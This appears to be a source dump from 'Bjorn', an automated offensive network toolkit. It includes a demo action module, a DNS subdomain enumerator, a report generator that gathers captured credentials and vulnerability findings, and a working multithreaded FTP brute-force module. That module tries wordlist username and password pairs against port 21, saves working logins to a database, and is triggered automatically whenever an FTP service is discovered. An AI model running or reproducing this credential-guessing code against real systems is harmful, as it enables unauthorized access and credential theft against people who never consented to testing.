"label": "Network Interface",
"choices": [],
"default": "auto",
"help": "'auto' tries to detect the default network interface."
},
"target": {
"type": "text",
"label": "Target (IP/Host)",
"default": "192.168.1.1",
"placeholder": "e.g. 192.168.1.10 or example.org",
"help": "Main target."
},
"port": {
"type": "number",
"label": "Port",
"min": 1,
"max": 65535,
"step": 1,
"default": 80
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 5,
"max": 600,
"step": 5,
"default": 60
},
"concurrency": {
"type": "range",
"label": "Concurrency",
"min": 1,
"max": 32,
"step": 1,
"default": 4,
"help": "Number of parallel tasks (demo only)."
},
"notes": {
"type": "text",
"label": "Notes",
"default": "",
"placeholder": "Free-form comments",
"help": "Free text field to demonstrate a simple string input."
}
}
# ---------------------------------------------------------------------------
# Dynamic detection of interfaces
# ---------------------------------------------------------------------------
import os
try:
import psutil
except Exception:
psutil = None
def _list_net_ifaces() -> list[str]:
names = set()
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x)
seen.add(x)
return unique
def compute_dynamic_b_args(base: dict) -> dict:
d = dict(base or {})
if "interface" in d:
d["interface"]["choices"] = _list_net_ifaces() or ["auto", "eth0", "wlan0"]
if d["interface"].get("default") not in d["interface"]["choices"]:
d["interface"]["default"] = "auto"
return d
# ---------------------------------------------------------------------------
# DemoAction class
# ---------------------------------------------------------------------------
import argparse
class DemoAction:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.meta = {
"class": b_class,
"module": b_module,
"enabled": b_enabled,
"action": b_action,
"category": b_category,
"name": b_name,
"description": b_description,
"author": b_author,
"version": b_version,
"icon": b_icon,
"examples": b_examples,
"docs_url": b_docs_url,
"args_schema": b_args,
}
def execute(self, ip=None, port=None, row=None, status_key=None):
"""Called by the orchestrator. This demo only prints arguments."""
self.shared_data.bjorn_orch_status = "DemoAction"
self.shared_data.comment_params = {"ip": ip, "port": port}
print("=== DemoAction :: executed ===")
print(f" IP/Target: {ip}:{port}")
print(f" Row: {row}")
print(f" Status key: {status_key}")
print("No real action performed: demonstration only.")
return "success"
def run(self, argv=None):
"""Standalone CLI mode for testing."""
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument("--profile", choices=b_args["profile"]["choices"],
default=b_args["profile"]["default"])
parser.add_argument("--interface", default=b_args["interface"]["default"])
parser.add_argument("--target", default=b_args["target"]["default"])
parser.add_argument("--port", type=int, default=b_args["port"]["default"])
parser.add_argument("--protocol", choices=b_args["protocol"]["choices"],
default=b_args["protocol"]["default"])
parser.add_argument("--verbose", action="store_true",
default=bool(b_args["verbose"]["default"]))
parser.add_argument("--timeout", type=int, default=b_args["timeout"]["default"])
parser.add_argument("--concurrency", type=int, default=b_args["concurrency"]["default"])
parser.add_argument("--notes", default=b_args["notes"]["default"])
args = parser.parse_args(argv)
print("=== DemoAction :: received parameters ===")
for k, v in vars(args).items():
print(f" {k:11}: {v}")
print("\n=== Demo usage of parameters ===")
if args.verbose:
print("[verbose] Verbose mode enabled → simulated detailed logs...")
if args.profile == "quick":
print("Profile: quick → would perform fast operations.")
elif args.profile == "deep":
print("Profile: deep → would perform longer, more thorough operations.")
else:
print("Profile: balanced → compromise between speed and depth.")
print(f"Target: {args.target}:{args.port}/{args.protocol} via {args.interface}")
print(f"Timeout: {args.timeout} sec, Concurrency: {args.concurrency}")
print("No real action performed: demonstration only.")
if __name__ == "__main__":
DemoAction(shared_data=None).run()

175
actions/dns_pillager.py Normal file
View File

@@ -0,0 +1,175 @@
# DNS Pillager for reconnaissance and enumeration of DNS infrastructure.
# Saves settings in `/home/bjorn/.settings_bjorn/dns_pillager_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -d, --domain Target domain for enumeration (overrides saved value).
# -w, --wordlist Path to subdomain wordlist (default: built-in list).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/dns).
# -t, --threads Number of threads for scanning (default: 10).
# -r, --recursive Enable recursive enumeration of discovered subdomains.
import os
import json
import dns.resolver
import threading
import argparse
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
import logging
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
b_class = "DNSPillager"
b_module = "dns_pillager"
b_enabled = 0
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/dns"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "dns_pillager_settings.json")
DEFAULT_RECORD_TYPES = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'CNAME', 'SOA']
class DNSPillager:
def __init__(self, domain, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, recursive=False):
self.domain = domain
self.wordlist = wordlist
self.output_dir = output_dir
self.threads = threads
self.recursive = recursive
self.discovered_domains = set()
self.lock = threading.Lock()
self.resolver = dns.resolver.Resolver()
self.resolver.timeout = 1
self.resolver.lifetime = 1
def save_results(self, results):
"""Save enumeration results to a JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(self.output_dir, f"dns_enum_{timestamp}.json")
with open(filename, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {filename}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def query_domain(self, domain, record_type):
"""Query a domain for specific DNS record type."""
try:
answers = self.resolver.resolve(domain, record_type)
return [str(answer) for answer in answers]
except:
return []
def enumerate_domain(self, subdomain):
"""Enumerate a single subdomain for all record types."""
full_domain = f"{subdomain}.{self.domain}" if subdomain else self.domain
results = {'domain': full_domain, 'records': {}}
for record_type in DEFAULT_RECORD_TYPES:
records = self.query_domain(full_domain, record_type)
if records:
results['records'][record_type] = records
with self.lock:
self.discovered_domains.add(full_domain)
logging.info(f"Found {record_type} records for {full_domain}")
return results if results['records'] else None
def load_wordlist(self):
"""Load subdomain wordlist or use built-in list."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r') as f:
return [line.strip() for line in f if line.strip()]
return ['www', 'mail', 'remote', 'blog', 'webmail', 'server', 'ns1', 'ns2', 'smtp', 'secure']
def execute(self):
"""Execute the DNS enumeration process."""
results = {'timestamp': datetime.now().isoformat(), 'findings': []}
subdomains = self.load_wordlist()
logging.info(f"Starting DNS enumeration for {self.domain}")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
enum_results = list(filter(None, executor.map(self.enumerate_domain, subdomains)))
results['findings'].extend(enum_results)
if self.recursive and self.discovered_domains:
logging.info("Starting recursive enumeration")
new_domains = set()
for domain in self.discovered_domains:
if domain != self.domain:
new_subdomains = [d.split('.')[0] for d in domain.split('.')[:-2]]
new_domains.update(new_subdomains)
if new_domains:
enum_results = list(filter(None, executor.map(self.enumerate_domain, new_domains)))
results['findings'].extend(enum_results)
self.save_results(results)
return results
def save_settings(domain, wordlist, output_dir, threads, recursive):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"domain": domain,
"wordlist": wordlist,
"output_dir": output_dir,
"threads": threads,
"recursive": recursive
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="DNS Pillager for domain reconnaissance")
parser.add_argument("-d", "--domain", help="Target domain for enumeration")
parser.add_argument("-w", "--wordlist", help="Path to subdomain wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for results")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-r", "--recursive", action="store_true", help="Enable recursive enumeration")
args = parser.parse_args()
settings = load_settings()
domain = args.domain or settings.get("domain")
wordlist = args.wordlist or settings.get("wordlist")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
recursive = args.recursive or settings.get("recursive")
if not domain:
logging.error("Domain is required. Use -d or save it in settings")
return
save_settings(domain, wordlist, output_dir, threads, recursive)
pillager = DNSPillager(
domain=domain,
wordlist=wordlist,
output_dir=output_dir,
threads=threads,
recursive=recursive
)
pillager.execute()
if __name__ == "__main__":
main()

457
actions/freya_harvest.py Normal file
View File

@@ -0,0 +1,457 @@
# Data collection and organization tool to aggregate findings from other modules.
# Saves settings in `/home/bjorn/.settings_bjorn/freya_harvest_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --input Input directory to monitor (default: /home/bjorn/Bjorn/data/output/).
# -o, --output Output directory for reports (default: /home/bjorn/Bjorn/data/reports).
# -f, --format Output format (json, html, md, default: all).
# -w, --watch Watch for new findings in real-time.
# -c, --clean Clean old data before processing.
import os
import json
import argparse
from datetime import datetime
import logging
import time
import shutil
import glob
import watchdog.observers
import watchdog.events
import markdown
import jinja2
from collections import defaultdict
b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_INPUT_DIR = "/home/bjorn/Bjorn/data/output"
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/reports"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "freya_harvest_settings.json")
# HTML template for reports
HTML_TEMPLATE = """
<!DOCTYPE html>
<html>
<head>
<title>Bjorn Reconnaissance Report</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.section { margin: 20px 0; padding: 10px; border: 1px solid #ddd; }
.vuln-high { background-color: #ffebee; }
.vuln-medium { background-color: #fff3e0; }
.vuln-low { background-color: #f1f8e9; }
table { border-collapse: collapse; width: 100%; margin-bottom: 20px; }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
th { background-color: #f5f5f5; }
h1, h2, h3 { color: #333; }
.metadata { color: #666; font-style: italic; }
.timestamp { font-weight: bold; }
</style>
</head>
<body>
<h1>Bjorn Reconnaissance Report</h1>
<div class="metadata">
<p class="timestamp">Generated: {{ timestamp }}</p>
</div>
{% for section in sections %}
<div class="section">
<h2>{{ section.title }}</h2>
{{ section.content }}
</div>
{% endfor %}
</body>
</html>
"""
class FreyaHarvest:
def __init__(self, input_dir=DEFAULT_INPUT_DIR, output_dir=DEFAULT_OUTPUT_DIR,
formats=None, watch_mode=False, clean=False):
self.input_dir = input_dir
self.output_dir = output_dir
self.formats = formats or ['json', 'html', 'md']
self.watch_mode = watch_mode
self.clean = clean
self.data = defaultdict(list)
self.observer = None
def clean_directories(self):
"""Clean output directory if requested."""
if self.clean and os.path.exists(self.output_dir):
shutil.rmtree(self.output_dir)
os.makedirs(self.output_dir)
logging.info(f"Cleaned output directory: {self.output_dir}")
def collect_wifi_data(self):
"""Collect WiFi-related findings."""
try:
wifi_dir = os.path.join(self.input_dir, "wifi")
if os.path.exists(wifi_dir):
for file in glob.glob(os.path.join(wifi_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['wifi'].append(data)
except Exception as e:
logging.error(f"Error collecting WiFi data: {e}")
def collect_network_data(self):
"""Collect network topology and host findings."""
try:
network_dir = os.path.join(self.input_dir, "topology")
if os.path.exists(network_dir):
for file in glob.glob(os.path.join(network_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['network'].append(data)
except Exception as e:
logging.error(f"Error collecting network data: {e}")
def collect_vulnerability_data(self):
"""Collect vulnerability findings."""
try:
vuln_dir = os.path.join(self.input_dir, "webscan")
if os.path.exists(vuln_dir):
for file in glob.glob(os.path.join(vuln_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['vulnerabilities'].append(data)
except Exception as e:
logging.error(f"Error collecting vulnerability data: {e}")
def collect_credential_data(self):
"""Collect credential findings."""
try:
cred_dir = os.path.join(self.input_dir, "packets")
if os.path.exists(cred_dir):
for file in glob.glob(os.path.join(cred_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['credentials'].append(data)
except Exception as e:
logging.error(f"Error collecting credential data: {e}")
def collect_data(self):
"""Collect all data from various sources."""
self.data.clear() # Reset data before collecting
self.collect_wifi_data()
self.collect_network_data()
self.collect_vulnerability_data()
self.collect_credential_data()
logging.info("Data collection completed")
def generate_json_report(self):
"""Generate JSON format report."""
try:
report = {
'timestamp': datetime.now().isoformat(),
'findings': dict(self.data)
}
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.json")
with open(output_file, 'w') as f:
json.dump(report, f, indent=4)
logging.info(f"JSON report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating JSON report: {e}")
def generate_html_report(self):
"""Generate HTML format report."""
try:
template = jinja2.Template(HTML_TEMPLATE)
sections = []
# Network Section
if self.data['network']:
content = "<h3>Network Topology</h3>"
for topology in self.data['network']:
content += f"<p>Hosts discovered: {len(topology.get('hosts', []))}</p>"
content += "<table><tr><th>IP</th><th>MAC</th><th>Open Ports</th><th>Status</th></tr>"
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
content += f"<tr><td>{ip}</td><td>{mac}</td><td>{', '.join(map(str, ports))}</td><td>{status}</td></tr>"
content += "</table>"
sections.append({"title": "Network Information", "content": content})
# WiFi Section
if self.data['wifi']:
content = "<h3>WiFi Findings</h3>"
for wifi_data in self.data['wifi']:
content += "<table><tr><th>SSID</th><th>BSSID</th><th>Security</th><th>Signal</th><th>Channel</th></tr>"
for network in wifi_data.get('networks', []):
content += f"<tr><td>{network.get('ssid', 'Unknown')}</td>"
content += f"<td>{network.get('bssid', 'Unknown')}</td>"
content += f"<td>{network.get('security', 'Unknown')}</td>"
content += f"<td>{network.get('signal_strength', 'Unknown')}</td>"
content += f"<td>{network.get('channel', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "WiFi Networks", "content": content})
# Vulnerabilities Section
if self.data['vulnerabilities']:
content = "<h3>Discovered Vulnerabilities</h3>"
for vuln_data in self.data['vulnerabilities']:
content += "<table><tr><th>Type</th><th>Severity</th><th>Target</th><th>Description</th><th>Recommendation</th></tr>"
for vuln in vuln_data.get('findings', []):
severity_class = f"vuln-{vuln.get('severity', 'low').lower()}"
content += f"<tr class='{severity_class}'>"
content += f"<td>{vuln.get('type', 'Unknown')}</td>"
content += f"<td>{vuln.get('severity', 'Unknown')}</td>"
content += f"<td>{vuln.get('target', 'Unknown')}</td>"
content += f"<td>{vuln.get('description', 'No description')}</td>"
content += f"<td>{vuln.get('recommendation', 'No recommendation')}</td></tr>"
content += "</table>"
sections.append({"title": "Vulnerabilities", "content": content})
# Credentials Section
if self.data['credentials']:
content = "<h3>Discovered Credentials</h3>"
content += "<table><tr><th>Type</th><th>Source</th><th>Service</th><th>Username</th><th>Timestamp</th></tr>"
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
content += f"<tr><td>{cred.get('type', 'Unknown')}</td>"
content += f"<td>{cred.get('source', 'Unknown')}</td>"
content += f"<td>{cred.get('service', 'Unknown')}</td>"
content += f"<td>{cred.get('username', 'Unknown')}</td>"
content += f"<td>{cred.get('timestamp', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "Credentials", "content": content})
# Generate HTML
os.makedirs(self.output_dir, exist_ok=True)
html = template.render(
timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
sections=sections
)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.html")
with open(output_file, 'w') as f:
f.write(html)
logging.info(f"HTML report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating HTML report: {e}")
def generate_markdown_report(self):
"""Generate Markdown format report."""
try:
md_content = [
"# Bjorn Reconnaissance Report",
f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
]
# Network Section
if self.data['network']:
md_content.append("## Network Information")
for topology in self.data['network']:
md_content.append(f"\nHosts discovered: {len(topology.get('hosts', []))}")
md_content.append("\n| IP | MAC | Open Ports | Status |")
md_content.append("|-------|-------|------------|---------|")
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
md_content.append(f"| {ip} | {mac} | {', '.join(map(str, ports))} | {status} |")
# WiFi Section
if self.data['wifi']:
md_content.append("\n## WiFi Networks")
md_content.append("\n| SSID | BSSID | Security | Signal | Channel |")
md_content.append("|------|--------|-----------|---------|----------|")
for wifi_data in self.data['wifi']:
for network in wifi_data.get('networks', []):
md_content.append(
f"| {network.get('ssid', 'Unknown')} | "
f"{network.get('bssid', 'Unknown')} | "
f"{network.get('security', 'Unknown')} | "
f"{network.get('signal_strength', 'Unknown')} | "
f"{network.get('channel', 'Unknown')} |"
)
# Vulnerabilities Section
if self.data['vulnerabilities']:
md_content.append("\n## Vulnerabilities")
md_content.append("\n| Type | Severity | Target | Description | Recommendation |")
md_content.append("|------|-----------|--------|-------------|----------------|")
for vuln_data in self.data['vulnerabilities']:
for vuln in vuln_data.get('findings', []):
md_content.append(
f"| {vuln.get('type', 'Unknown')} | "
f"{vuln.get('severity', 'Unknown')} | "
f"{vuln.get('target', 'Unknown')} | "
f"{vuln.get('description', 'No description')} | "
f"{vuln.get('recommendation', 'No recommendation')} |"
)
# Credentials Section
if self.data['credentials']:
md_content.append("\n## Discovered Credentials")
md_content.append("\n| Type | Source | Service | Username | Timestamp |")
md_content.append("|------|---------|----------|-----------|------------|")
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
md_content.append(
f"| {cred.get('type', 'Unknown')} | "
f"{cred.get('source', 'Unknown')} | "
f"{cred.get('service', 'Unknown')} | "
f"{cred.get('username', 'Unknown')} | "
f"{cred.get('timestamp', 'Unknown')} |"
)
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.md")
with open(output_file, 'w') as f:
f.write('\n'.join(md_content))
logging.info(f"Markdown report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating Markdown report: {e}")
def generate_reports(self):
"""Generate reports in all specified formats."""
os.makedirs(self.output_dir, exist_ok=True)
if 'json' in self.formats:
self.generate_json_report()
if 'html' in self.formats:
self.generate_html_report()
if 'md' in self.formats:
self.generate_markdown_report()
def start_watching(self):
"""Start watching for new data files."""
class FileHandler(watchdog.events.FileSystemEventHandler):
def __init__(self, harvester):
self.harvester = harvester
def on_created(self, event):
if event.is_directory:
return
if event.src_path.endswith('.json'):
logging.info(f"New data file detected: {event.src_path}")
self.harvester.collect_data()
self.harvester.generate_reports()
self.observer = watchdog.observers.Observer()
self.observer.schedule(FileHandler(self), self.input_dir, recursive=True)
self.observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
self.observer.stop()
self.observer.join()
def execute(self):
"""Execute the data collection and reporting process."""
try:
logging.info("Starting data collection")
if self.clean:
self.clean_directories()
# Initial data collection and report generation
self.collect_data()
self.generate_reports()
# Start watch mode if enabled
if self.watch_mode:
logging.info("Starting watch mode for new data")
try:
self.start_watching()
except KeyboardInterrupt:
logging.info("Watch mode stopped by user")
finally:
if self.observer:
self.observer.stop()
self.observer.join()
logging.info("Data collection and reporting completed")
except Exception as e:
logging.error(f"Error during execution: {e}")
raise
finally:
# Ensure observer is stopped if watch mode was active
if self.observer and self.observer.is_alive():
self.observer.stop()
self.observer.join()
def save_settings(input_dir, output_dir, formats, watch_mode, clean):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"input_dir": input_dir,
"output_dir": output_dir,
"formats": formats,
"watch_mode": watch_mode,
"clean": clean
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Data collection and organization tool")
parser.add_argument("-i", "--input", default=DEFAULT_INPUT_DIR, help="Input directory to monitor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for reports")
parser.add_argument("-f", "--format", choices=['json', 'html', 'md', 'all'], default='all',
help="Output format")
parser.add_argument("-w", "--watch", action="store_true", help="Watch for new findings")
parser.add_argument("-c", "--clean", action="store_true", help="Clean old data before processing")
args = parser.parse_args()
settings = load_settings()
input_dir = args.input or settings.get("input_dir")
output_dir = args.output or settings.get("output_dir")
formats = ['json', 'html', 'md'] if args.format == 'all' else [args.format]
watch_mode = args.watch or settings.get("watch_mode", False)
clean = args.clean or settings.get("clean", False)
save_settings(input_dir, output_dir, formats, watch_mode, clean)
harvester = FreyaHarvest(
input_dir=input_dir,
output_dir=output_dir,
formats=formats,
watch_mode=watch_mode,
clean=clean
)
harvester.execute()
if __name__ == "__main__":
main()

268
actions/ftp_bruteforce.py Normal file
View File

@@ -0,0 +1,268 @@
"""
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='ftp')
- Conserve la logique dorigine (queue/threads, sleep éventuels, etc.)
"""
import os
import threading
import logging
import time
from ftplib import FTP
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_bruteforce"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70
b_cooldown = 1800  # 30 minutes between two runs
b_rate_limit = '3/86400'  # at most 3 runs per day
class FTPBruteforce:
"""Wrapper orchestrateur -> FTPConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_bruteforce = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""Lance le bruteforce FTP pour (ip, port)."""
return self.ftp_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "FTPBruteforce"
# original behavior: a small visual delay
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""Gère les tentatives FTP, persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
# ---------- file utilities ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- FTP ----------
def ftp_connect(self, adresse_ip: str, user: str, password: str) -> bool:
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
try:
conn.quit()
except Exception:
pass
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception:
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ftp',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ftp'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for FTP bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
self.queue.task_done()
# Configurable pause between each FTP attempt
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
time.sleep(self.shared_data.timewait_ftp)
def run_bruteforce(self, adresse_ip: str, port: int):
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords) + 1  # (original logic kept)
if len(self.users) * len(self.passwords) == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, len(self.users) * len(self.passwords)))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results
# ---------- persistence DB ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="ftp",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
    def removeduplicates(self):
        # Kept for compatibility with the original CSV flow; duplicates are handled by the DB upsert.
        pass
if __name__ == "__main__":
try:
sd = SharedData()
ftp_bruteforce = FTPBruteforce(sd)
logger.info("FTP brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
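FTPConnector above fans the credential attempts out through a queue.Queue consumed by a pool of worker threads, guarding the shared result list with a lock and reporting success through a one-element list. A self-contained sketch of that producer/consumer shape (try_login is a stand-in for ftp_connect; all names and values are illustrative):

import threading
from queue import Queue, Empty

def try_login(user: str, password: str) -> bool:
    # Stand-in for FTPConnector.ftp_connect(); pretend exactly one pair works.
    return (user, password) == ("admin", "admin")

work: Queue = Queue()
for user in ["root", "admin"]:
    for password in ["toor", "admin"]:
        work.put((user, password))

hits, lock, found = [], threading.Lock(), [False]

def worker() -> None:
    while True:
        try:
            user, password = work.get_nowait()
        except Empty:
            return
        try:
            if try_login(user, password):
                with lock:                  # protect the shared result list
                    hits.append((user, password))
                    found[0] = True
        finally:
            work.task_done()                # always mark the item done, even on error

threads = [threading.Thread(target=worker, daemon=True) for _ in range(4)]
for t in threads:
    t.start()
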